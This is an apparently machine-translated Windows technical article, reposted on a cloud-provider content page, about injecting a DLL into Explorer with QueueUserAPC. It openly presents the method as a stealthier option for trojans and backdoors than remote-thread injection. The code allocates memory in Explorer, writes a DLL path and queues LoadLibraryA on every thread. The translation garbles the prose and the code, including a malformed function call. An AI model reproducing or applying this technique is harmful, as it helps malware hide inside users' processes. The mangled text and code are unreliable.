Brute force injection Explorer

Source: Internet
Author: User
Tags apc
Brute force injection Explorer
Jfpan20000@sina.com (pjf)
The most natural way to inject your own code into a running process is to use createremotethread,
Nowadays, remote thread injection is a flood of disasters. The same tool monitors remote thread injection and prevents remote thread injection.
The injection to explorer or IE when a trojan or backdoor is started is like writing it on your face.
"I am a thief.
To hide user-mode code in other processes more implicitly, you should conceal your own line in the injection process.
Yes. The following describes a simple but violent method. The example is to add
Load your own DLL.
First, we mentioned an API: queueuserapc.

DWORD queueuserapc (
Papcfunc pfnapc, // APC Function
Handle hthread, // handle to thread
Ulong_ptr dwdata // APC function parameter
;

Everyone should be familiar with this API. It is directly transferred to the System Service ntqueueapcthread to benefit
Use keinsertqueueapc to insert an APC object to the APC queue of the given target thread. If kideliverapc
It's okay to successfully construct the APC environment and execute our code. Unfortunately, it's not that smooth,
Whether or not userapcpending in apcstate is true has an important impact. The result is that you will always wait until the flowers have thanked you.
Your code is still not executed. The core State is often not a problem. You can assign values by yourself, but the user State
The program is not easy to do. What should I do? In fact, the simplest thing is to let the system do it without doing it well.
In fact, the system will set userapcpending
True (when kedelayexecutionthread/kewaitformultipleobjects/kewaitforsingleobject
It is possible to use testforalertpending and ketestalertthread.
), The simplest example is to insert the APC code after the target thread calls sleepex (***, true ).
OK.
Fortunately, in the explorer process, there is always a thread that fits us, so it is the simplest but not
The best way is to enumerate all threads in Explorer and insert all threads as follows:

......
DWORD ret;
Char * dllname = "C: // mydll. dll ";
Int Len = strlen (dllname) + 1;
Pvoid Param = virtualallocex (hprocess, null, Len,
Mem_commit | mem_top_down,
Page_readwrite );
If (Param! = NULL)
{
If (writeprocessmemory (hprocess, Param,
(Lpvoid) dllname, Len, & RET ))
{
For (DWORD p = 0; P <numberofthreads; P ++)
{
Hthread = openthread (thread_all_access, 0, threadid [p]);
If (hthread! = 0)
{
Injectdll (hprocess, hthread, (DWORD) PARAM );
Closehandle (hthread );
}
}
}
......

Injectdll:
Void injectdll (handle hprocess, handle hthread, dword param)
{
Queueuserapc (
(Papcfunc) getprocaddress (getmodulehandle ("kernel32.dll", "loadlibrarya ",
Hthread,
(DWORD) Param
;
}
 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.